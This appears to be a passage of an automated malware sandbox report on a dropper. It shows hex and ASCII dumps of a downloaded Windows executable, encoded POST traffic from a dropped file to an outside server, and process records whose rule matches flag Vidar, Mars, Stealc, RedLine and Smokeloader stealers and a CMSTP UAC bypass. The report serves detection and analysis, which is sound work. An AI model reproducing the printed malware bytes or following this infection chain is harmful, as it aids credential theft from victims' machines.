                                                                                                                                                                                                                                            Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4a 00 00 00 00 00 00 0c 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65
                                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08|7@B.rsrc<<@@JJ@@@Boole
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851778030 CEST1289INData Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff
                                                                                                                                                                                                                                            Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851784945 CEST1289INData Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f
                                                                                                                                                                                                                                            Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851797104 CEST1289INData Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72
                                                                                                                                                                                                                                            Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851804018 CEST1289INData Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65
                                                                                                                                                                                                                                            Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851810932 CEST1289INData Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc
                                                                                                                                                                                                                                            Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851823092 CEST1289INData Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00
                                                                                                                                                                                                                                            Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851830959 CEST1289INData Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10
                                                                                                                                                                                                                                            Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851839066 CEST1289INData Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00
                                                                                                                                                                                                                                            Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:16.851852894 CEST1289INData Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00
                                                                                                                                                                                                                                            Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:17.052990913 CEST1289INData Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65
                                                                                                                                                                                                                                            Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            6192.168.2.74970520.157.87.4580648C:\Users\user\AppData\Local\Temp\u48o.1.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:21.055814981 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 300
                                                                                                                                                                                                                                            Host: svc.iolo.com
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                            User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:21.264677048 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6c 68 48 43 56 59 54 6e 41 79 6f 53 32 68 50 6b 39 49 54 55 43 51 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                                            Data Ascii: /eZBs+BlQFXq0YdKO1rWGlhHCVYTnAyoS2hPk9ITUCQfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:21.564630032 CEST469INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            cache-control: private
                                                                                                                                                                                                                                            content-length: 256
                                                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                            x-whom: Ioloweb8
                                                                                                                                                                                                                                            date: Tue, 23 Apr 2024 07:43:10 GMT
                                                                                                                                                                                                                                            set-cookie: SERVERID=svc8; path=/
                                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                                            Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32
                                                                                                                                                                                                                                            Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.74972420.157.87.4580648C:\Users\user\AppData\Local\Temp\u48o.1.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:35.630181074 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 300
                                                                                                                                                                                                                                            Host: svc.iolo.com
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                            User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:35.831243038 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6c 68 48 43 56 59 54 6e 41 79 6f 53 32 68 50 6b 39 49 54 55 43 51 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                                            Data Ascii: /eZBs+BlQFXq0YdKO1rWGlhHCVYTnAyoS2hPk9ITUCQtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:36.035351038 CEST405INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            cache-control: private
                                                                                                                                                                                                                                            content-length: 192
                                                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                            x-whom: Ioloweb6
                                                                                                                                                                                                                                            date: Tue, 23 Apr 2024 07:43:24 GMT
                                                                                                                                                                                                                                            set-cookie: SERVERID=svc6; path=/
                                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                                            Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53
                                                                                                                                                                                                                                            Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS


                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:09:43:07
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\zLwT7vCojz.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\zLwT7vCojz.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:485'377 bytes
                                                                                                                                                                                                                                            MD5 hash:577592F54BB4B19D416913B1816F7971
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1362288506.0000000006B8B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1558366239.00000000043AD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:09:43:11
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\u48o.0.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:336'384 bytes
                                                                                                                                                                                                                                            MD5 hash:65A31455A497CAEE44C5AA749C50E40B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000A.00000003.1291217961.0000000005CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.1688838586.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000A.00000002.1688142273.0000000004082000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.1687815536.000000000406C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                            • Detection: 42%, Virustotal, Browse
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                            Start time:09:43:15
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\Qg_Appv5.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:8'538'160 bytes
                                                                                                                                                                                                                                            MD5 hash:54D53F5BDB925B3ED005A84B5492447F
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                            • Detection: 3%, Virustotal, Browse
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                            Start time:09:43:18
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\u48o.1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\u48o.1.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:4'866'096 bytes
                                                                                                                                                                                                                                            MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000E.00000000.1354291806.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 4%, ReversingLabs
                                                                                                                                                                                                                                            • Detection: 3%, Virustotal, Browse
                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:09:43:20
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 1476
                                                                                                                                                                                                                                            Imagebase:0x230000
                                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                            Start time:09:43:20
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user~1\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            Imagebase:0x800000
                                                                                                                                                                                                                                            File size:2'469'936 bytes
                                                                                                                                                                                                                                            MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                            • Detection: 0%, Virustotal, Browse
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                            Start time:09:43:21
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            Imagebase:0x890000
                                                                                                                                                                                                                                            File size:2'469'936 bytes
                                                                                                                                                                                                                                            MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                            Start time:09:43:24
                                                                                                                                                                                                                                            Start date:23/04/2024
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            Imagebase:0x410000
                                                                                                                                                                                                                                            File size:236'544 bytes
